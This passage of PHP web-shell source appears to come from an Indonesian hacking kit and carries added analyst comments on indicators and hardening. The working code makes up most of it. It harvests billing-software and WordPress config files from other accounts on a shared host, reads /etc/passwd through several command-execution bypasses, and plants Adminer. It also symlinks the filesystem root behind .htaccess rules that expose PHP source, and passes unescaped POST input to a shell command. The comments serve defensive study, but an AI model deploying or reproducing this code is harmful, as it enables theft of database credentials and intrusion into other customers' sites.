  1178. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  1179. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  1180. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  1181. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  1182. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  1183. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  1184. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  1185. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  1186. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1187. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  1188. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  1189. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  1190. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  1191. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  1192. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  1193. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  1194. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  1195. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  1196. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  1197. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  1198. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  1199. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  1200. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  1201. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  1202. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  1203. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1204. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  1205. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  1206. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1207. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  1208. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  1209. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  1210. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  1211. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  1212. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
  1213. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  1214. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  1215. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  1216. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  1217. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  1218. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1219. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1220. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1221. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  1222. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1223. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  1224. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  1225. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1226. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1227. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1228. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  1229. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  1230. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  1231. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  1232. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  1233. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  1234. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  1235. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  1236. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  1237. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  1238. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  1239. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  1240. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1241. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  1242. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  1243. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1244. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  1245. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  1246. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  1247. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  1248. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  1249. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1250. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  1251. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  1252. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1253. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1254. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1255. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  1256. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  1257. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  1258. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  1259. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1260. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  1261. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  1262. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  1263. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  1264. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  1265. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1266. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  1267. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  1268. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  1269. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  1270. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  1271. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  1272. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  1273. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  1274. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  1275. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  1276. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  1277. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  1278. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  1279. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  1280. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  1281. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  1282. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  1283. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  1284. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1285. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  1286. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  1287. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  1288. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  1289. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1290. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  1291. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  1292. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1293. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  1294. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1295. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  1296. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  1297. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  1298. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  1299. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1300. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1301. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  1302. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  1303. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  1304. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  1305. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1306. );
  // Copy every candidate that could be read and is non-empty into the drop directory.
  1307. foreach($grab_config as $config => $nama_config) {
  1308. $ambil_config = file_get_contents($config);
  1309. if($ambil_config == '') {
  1310. } else {
  1311. $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
  1312. fputs($file_config,$ambil_config);
  1313. }
  1314. }
  1315. }
  1316. }
  // The success message is printed whether or not any file was copied.
  1317. echo "<p class='text-center'>Success Get Config!!</p>
  1318. <a href='?dir=$dir/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
  1319. }else{
  // Initial view: /etc/passwd is read and echoed into the textarea.
  1320. echo "<form method='post'>
  1321. <p class='text-danger'>/etc/passwd error ? <a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a></p>
  1322. <textarea name='passwd' class='form-control' rows='13'>".file_get_contents('/etc/passwd')."</textarea><br/>
  1323. <input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>
  1324. </form>";
  1325. }
  1326. exit;
  1327. }
  1328.  
  1329.  
  1330. /*
  1331. Bypass etc/passwd
  1332. */
  /*
   * Web-shell handler for aksi=passwbypass (analyst annotation).
   * Offers ten buttons that each obtain the account list by a different route,
   * so that the operator can fall back when one PHP function is unavailable:
   *   - contents of /etc/passwd through system(), passthru(), exec() or
   *     shell_exec() running `cat /etc/passwd`, or through a posix_getpwuid()
   *     loop over UIDs 0..5999;
   *   - user names only, through an awk one-liner over /etc/passwd or through
   *     `ls /var/mail` run with the same four command-execution functions.
   * The commands are fixed strings; no request value is placed into them.
   * Hardening/detection notes: the variety of routes shows why disabling a
   * single function is not sufficient on its own; a PHP worker spawning `cat
   * /etc/passwd`, `awk -F:` or `ls /var/mail` is a useful process-level alert.
   */
  1333. if($_GET['aksi'] == 'passwbypass') {
  1334. echo '<div claas="container">
  1335. <form method="POST">
  1336. <p class="text-center">Bypass etc/passwd With :</p>
  1337. <div class="d-flex justify-content-center flex-wrap">
  1338. <input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">
  1339. <input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">
  1340. <input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">
  1341. <input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">
  1342. <input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
  1343. </div><hr/>
  1344. <p class="text-center">Bypass User With :</p>
  1345. <div class="d-flex justify-content-center flex-wrap">
  1346. <input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
  1347. <input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
  1348. <input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">
  1349. <input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">
  1350. <input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
  1351. </div>
  1352. </form>';
  1353.  
  // Fixed command and path used by the branches below.
  1354. $mail = 'ls /var/mail';
  1355. $paswd = '/etc/passwd';
  // First group: full /etc/passwd contents, one branch per submit button.
  1356. if($_POST['syst']) {
  1357. echo"<textarea class='form-control' rows='13'>";
  1358. echo system("cat $paswd");
  1359. echo"</textarea><br/>";
  1360. }
  1361. if($_POST['passth']) {
  1362. echo"<textarea class='form-control' rows='13'>";
  1363. echo passthru("cat $paswd");
  1364. echo"</textarea><br/>";
  1365. }
  1366. if($_POST['ex']) {
  1367. echo"<textarea class='form-control' rows='13'>";
  1368. echo exec("cat $paswd");
  1369. echo"</textarea><br/>";
  1370. }
  1371. if($_POST['shex']) {
  1372. echo"<textarea class='form-control' rows='13'>";
  1373. echo shell_exec("cat $paswd");
  1374. echo"</textarea><br/>";
  1375. }
  // No file read and no shell here: account records are requested from the
  // system one UID at a time and printed field by field.
  1376. if($_POST['melex']) {
  1377. echo"<textarea class='form-control' rows='13'>";
  1378. for($uid=0;$uid<6000;$uid++){
  1379. $ara = posix_getpwuid($uid);
  1380. if (!empty($ara)) {
  1381. while (list ($key, $val) = each($ara)){
  1382. print "$val:";
  1383. }
  1384. print "n";
  1385. }
  1386. }
  1387. echo"</textarea><br/>";
  1388. }
  1389.  
  // Second group: user names only.
  1390. if ($_POST['awkuser']) {
  1391. echo"<textarea class='form-control' rows='13'>
  1392. ".shell_exec("awk -F: '{ print $1 }' $paswd | sort")."
  1393. </textarea><br/>";
  1394. }
  1395. if ($_POST['systuser']) {
  1396. echo"<textarea class='form-control' rows='13'>";
  1397. echo system("$mail");
  1398. echo "</textarea><br>";
  1399. }
  1400. if ($_POST['passthuser']) {
  1401. echo"<textarea class='form-control' rows='13'>";
  1402. echo passthru("$mail");
  1403. echo "</textarea><br>";
  1404. }
  1405. if ($_POST['exuser']) {
  1406. echo"<textarea class='form-control' rows='13'>";
  1407. echo exec("$mail");
  1408. echo "</textarea><br>";
  1409. }
  1410. if ($_POST['shexuser']) {
  1411. echo"<textarea class='form-control' rows='13'>";
  1412. echo shell_exec("$mail");
  1413. echo "</textarea><br>";
  1414. }
  1415. echo "</div>";
  1416. exit;
  1417. }
  1418.  
  1419.  
  1420. /*
  1421. Adminer
  1422. */
  /*
   * Web-shell handler for aksi=adminer (analyst annotation).
   * If no file named adminer.php exists in the current working directory, it
   * downloads Adminer 4.2.4 from www.adminer.org into that file name, then
   * prints a link to it. Adminer is a legitimate single-file database
   * administration tool; its presence here means it was placed by this script,
   * not by the site owner.
   * Indicators: an unexpected adminer.php in a web-accessible directory, and an
   * outbound HTTPS request from the web server to www.adminer.org.
   * $dir is defined outside this excerpt.
   */
  1423. if($_GET['aksi'] == 'adminer') {
  // Web path of $dir relative to the document root, used to build the link.
  1424. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  /*
   * Fetches $url with cURL and writes the response to the local file $isi.
   * Returns the result of curl_exec(). TLS certificate verification is
   * switched off (CURLOPT_SSL_VERIFYPEER = false), so the origin of the
   * downloaded file is not authenticated.
   */
  1425. function adminer($url, $isi) {
  1426. $fp = fopen($isi, "w");
  1427. $ch = curl_init();
  1428. curl_setopt($ch, CURLOPT_URL, $url);
  1429. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1430. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1431. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1432. curl_setopt($ch, CURLOPT_FILE, $fp);
  1433. return curl_exec($ch);
  1434. curl_close($ch);
  1435. fclose($fp);
  1436. ob_flush();
  1437. flush();
  1438. }
  1439. if(file_exists('adminer.php')) {
  1440. echo "<a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  1441. } else {
  // "Berhasil Membuat Adminer" = "Adminer created successfully";
  // "Gagal Membuat Adminer" = "failed to create Adminer".
  1442. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1443. echo "<p class='text-center'>Berhasil Membuat Adminer</p><a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  1444. } else {
  1445. echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>";
  1446. }
  1447. }
  1448. exit;
  1449. }
  1450.  
  1451.  
  1452. /*
  1453. * Symlink Server
  1454. * Kuda Shell
  1455. */
  1456. if($_GET['aksi'] == 'symlink') {
  1457. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1458. $d0mains = @file("/etc/named.conf");
  1459. if(!$d0mains) {
  1460. die ("[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
  1461. }
  1462. ##htaccess
  1463. if($d0mains){
  1464. @mkdir("indosec_sym",0777);
  1465. @chdir("indosec_sym");
  1466. @exe("ln -s / root");
  1467. $file3 = 'Options Indexes FollowSymLinks
  1468. DirectoryIndex indsc.html
  1469. AddType text/plain php html php5 phtml
  1470. AddHandler text/plain php html php5 phtml
  1471. Satisfy Any';
  1472. $fp3 = fopen('.htaccess','w');
  1473. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1474. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1475. <div class='tmp'>
  1476. <table class='text-center table-responsive'>
  1477. <thead class='bg-info'>
  1478. <th>No.</th>
  1479. <th>Domains</th>
  1480. <th>Users</th>
  1481. <th>symlink </th>
  1482. </thead>";
  1483. $dcount = 1;
  1484. foreach($d0mains as $d0main){
  1485. if(eregi("zone",$d0main)){
  1486. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1487. flush();
  1488. if(strlen(trim($domains[1][0])) > 2){
  1489. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1490. echo "<tr>
  1491. <td>".$dcount."</td>
  1492. <td class='text-left'><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td>
  1493. <td>".$user['name']."</td>
  1494. <td><a href='$full/indosec_sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a></td>
  1495. </tr>";
  1496. flush();
  1497. $dcount++;
  1498. }
  1499. }
  1500. }
  1501. echo "</table></div>";
  1502. }else{
  1503. $TEST = @file('/etc/passwd');
  1504. if ($TEST){
  1505. @mkdir("indosec_sym",0777);
  1506. @chdir("indosec_sym");
  1507. @exe("ln -s / root");
  1508. $file3 = 'Options Indexes FollowSymLinks
  1509. DirectoryIndex indsc.html
  1510. AddType text/plain php html php5 phtml
  1511. AddHandler text/plain php html php5 phtml
  1512. Satisfy Any';
  1513. $fp3 = fopen('.htaccess','w');
  1514. $fw3 = fwrite($fp3,$file3);
  1515. @fclose($fp3);
  1516. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1517. <div class='tmp'>
  1518. <table class='text-center table-responsive'>
  1519. <thead class='bg-warning'>
  1520. <th>No.</th>
  1521. <th>Users</th>
  1522. <th>symlink </th>
  1523. </thead>";
  1524. $dcount = 1;
  1525. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1526. while(!feof($file)){
  1527. $s = fgets($file);
  1528. $matches = array();
  1529. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1530. $matches = str_replace("home/","",$matches[1]);
  1531. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1532. continue;
  1533. echo "<tr>
  1534. <td>".$dcount."</td>
  1535. <td>".$matches."</td>
  1536. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
  1537. </tr>";
  1538. $dcount++;
  1539. }
  1540. fclose($file);
  1541. echo "</table></div>";
  1542. }else{
  1543. if($os != "Windows"){
  1544. @mkdir("indosec_sym",0777);
  1545. @chdir("indosec_sym");
  1546. @exe("ln -s / root");
  1547. $file3 = 'Options Indexes FollowSymLinks
  1548. DirectoryIndex indsc.html
  1549. AddType text/plain php html php5 phtml
  1550. AddHandler text/plain php html php5 phtml
  1551. Satisfy Any';
  1552. $fp3 = fopen('.htaccess','w');
  1553. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1554. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
  1555. <div class='tmp'>
  1556. <table class='text-center table-responsive'>
  1557. <thead class='bg-danger'>
  1558. <th>ID.</th>
  1559. <th>Users</th>
  1560. <th>symlink </th>
  1561. </thead>";
  1562. $temp = "";$val1 = 0;$val2 = 1000;
  1563. for(;$val1 <= $val2;$val1++){
  1564. $uid = @posix_getpwuid($val1);
  1565. if ($uid)$temp .= join(':',$uid)."\n";
  1566. }
  1567. echo '<br/>';$temp = trim($temp);
  1568. $file5 = fopen("test.txt","w");
  1569. fputs($file5,$temp);
  1570. fclose($file5);$dcount = 1;$file =
  1571. fopen("test.txt", "r") or exit("Unable to open file!");
  1572. while(!feof($file)){
  1573. $s = fgets($file);$matches = array();
  1574. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1575. $matches = str_replace("home/","",$matches[1]);
  1576. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1577. continue;
  1578. echo "<tr>
  1579. <td>".$dcount."</td>
  1580. <td>".$matches."</td>
  1581. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
  1582. </tr>";
  1583. $dcount++;
  1584. }
  1585. fclose($file);
  1586. echo "</table></div>";
  1587. unlink("test.txt");
  1588. }
  1589. }
  1590. }
  1591. exit;
  1592. }
  1593.  
  // Analyst note: handler for ?aksi=symread. It prints a form whose textarea is
  // filled with the contents of /etc/named.conf (escaped with htmlentities) and,
  // when the form is posted back with &save=1, stores the submitted text locally.
  // Triage indicators: a file named named.txt in the script's working directory
  // and requests carrying aksi=symread in the query string.
  // Hardening: an open_basedir restriction and file permissions that keep
  // /etc/named.conf unreadable to the web-server account deny this read.
  1594. if($_GET['aksi'] == 'symread') {
  1595. echo "read /etc/named.conf";
  1596. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
  1597. <textarea class='form-control' rows='13' name='file'>";
  1598. flush();
  1599. flush();
  1600. $file = '/etc/named.conf';
  1601. $r3ad = @fopen($file, 'r');
  1602. if ($r3ad){
  1603. $content = @fread($r3ad, @filesize($file));
  1604. echo "".htmlentities($content)."";
  // NOTE(review): every "else if" below repeats the same !$r3ad test, so when
  // fopen() fails only the show_source() branch runs; the highlight_file() and
  // symlink() branches are never reached as written.
  1605. }else if (!$r3ad) {
  1606. $r3ad = @show_source($file) ;
  1607. }else if (!$r3ad) {
  1608. $r3ad = @highlight_file($file);
  1609. }else if (!$r3ad) {
  1610. $sm = @symlink($file,'sym.txt');
  1611. if ($sm){
  1612. $r3ad = @fopen('sym/sym.txt', 'r');
  1613. $content = @fread($r3ad, @filesize($file));
  1614. echo "".htmlentities($content)."";
  1615. }
  1616. }
  1617. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
  // Forensic artifact: the POSTed "file" field is passed through stripcslashes()
  // and written to named.txt, overwriting any existing file of that name.
  1618. if(isset($_GET['save'])){
  1619. $cont = stripcslashes($_POST['file']);
  1620. $f = fopen('named.txt','w');
  1621. $w = fwrite($f,$cont);
  1622. if($w){
  1623. echo '<br/>save has been successfully';
  1624. }
  1625. fclose($f);
  1626. }
  1627. exit;
  1628. }
  1629.  
  // Analyst note: handler for ?aksi=sym_404. On submit it creates the directory
  // indosec_sym404 (mode 0777), links the path given in POST "dir" under the name
  // given in POST "isi", and writes indosec_sym404/.htaccess. The form's default
  // target is the current account's public_html/wp-config.php.
  // Triage indicators: a directory named indosec_sym404 under a web root, an
  // .htaccess containing ReadmeName together with "AddHandler text/plain php ...",
  // and symlinks whose targets are outside the owning account's home.
  // Hardening: Apache "Options SymLinksIfOwnerMatch" in place of FollowSymLinks and
  // an AllowOverride setting that does not let .htaccess change Options or
  // FileInfo keep a dropped .htaccess like this one from taking effect.
  1630. if ($_GET['aksi'] == 'sym_404'){
  1631. $cp = get_current_user();
  1632. if($_POST['execute']){
  1633. @rmdir("indosec_sym404");
  1634. @mkdir("indosec_sym404", 0777);
  1635. $dir = $_POST['dir'];
  1636. $isi = $_POST['isi'];
  // NOTE(review): both POST fields are concatenated into a shell command with no
  // escaping; the same link is then attempted again through PHP's symlink().
  1637. @system("ln -s ".$dir."indosec_sym404/".$isi);
  1638. @symlink($dir,"indosec_sym404/".$isi);
  // The .htaccess turns on directory listing and symlink following and maps
  // php/html/php5/phtml to text/plain, so a linked script is served as text
  // rather than executed. The file handle is not closed in this block.
  1639. $inija = fopen("indosec_sym404/.htaccess", "w");
  1640. @fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any");
  1641. echo'<a href="/indosec_sym404/" target="_blank" class="btn btn-success btn-block mb-3">Click Me!!</a>';
  1642. }else{
  1643. echo '<h2>Symlink 404</h2>
  1644. <form method="post">
  1645. File Target: <input type="text" class="form-control" name="dir" value="/home/'.$cp.'/public_html/wp-config.php"><br/>
  1646. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
  1647. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
  1648. <p class="text-muted">NB: Letak wp-config tidak semuanya berada di <u>public_html/wp-config.php</u> jadi silahkan ubah sesuai letaknya.</p>
  1649. </form>';
  1650. }
  1651. exit;
  1652. }
  1653.  
  1654.  
  // Analyst note: handler for ?aksi=sym_bypas. First visit: shows /etc/passwd in a
  // form. After submit (or whenever a non-empty passwd.txt already exists): stores
  // the submitted text in passwd.txt and renders, for the first colon-separated
  // field of every line, links to <path>/sym/root/home/<user>/public_html and an
  // ftp:// equivalent. The sym/root link itself is not created in this block.
  // Triage indicators: passwd.txt in a web-served directory, requests with
  // aksi=sym_bypas, and a "sym" directory holding a link named "root".
  // Hardening: the same symlink and open_basedir controls that apply to the other
  // symlink handlers apply here; account names alone are low-value once
  // cross-account reads through symlinks are blocked.
  1655. if ($_GET['aksi'] == 'sym_bypas'){
  1656. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1657. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  1658. $u = explode("/",$pageFTP );
  1659. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  1660. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  1661. $cont = stripcslashes($_POST['file']);
  // passwd.txt is only written when it does not exist yet; a leftover copy from an
  // earlier run is reused as-is.
  1662. if(!file_exists('passwd.txt')){
  1663. $f = @fopen('passwd.txt','w');
  1664. $w = @fwrite($f,$cont);
  1665. fclose($f);
  1666. }
  1667. if($w or @filesize('passwd.txt') > 0){
  1668. echo "<div class='tmp'>
  1669. <table width='100%' class='text-center table-responsive mb-4'>
  1670. <thead class='bg-info'>
  1671. <th>Users</th>
  1672. <th>symlink</th>
  1673. <th>FTP</th>
  1674. </thead>";
  1675. flush();
  1676. $fil3 = file('passwd.txt');
  // NOTE(review): $user comes straight from the stored text and is printed into
  // HTML and href attributes without escaping.
  1677. foreach ($fil3 as $f){
  1678. $u=explode(':', $f);
  1679. $user = $u['0'];
  1680. echo "<tr>
  1681. <td class='text-left pl-1'>$user</td>
  1682. <td>
  1683. <a href='$full/sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  1684. </td>
  1685. <td>
  1686. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  1687. </td>
  1688. </tr>";
  1689. flush();
  1690. flush();
  1691. }
  1692. echo "</tr></table></div>";
  1693. die();
  1694. }
  1695.  
  1696. }
  1697.  
  1698. echo "read /etc/passwd <font color='red'>error ? </font><a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a>
  1699. <form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
  1700. <textarea class='form-control' rows='13' name='file'>";
  1701. flush();
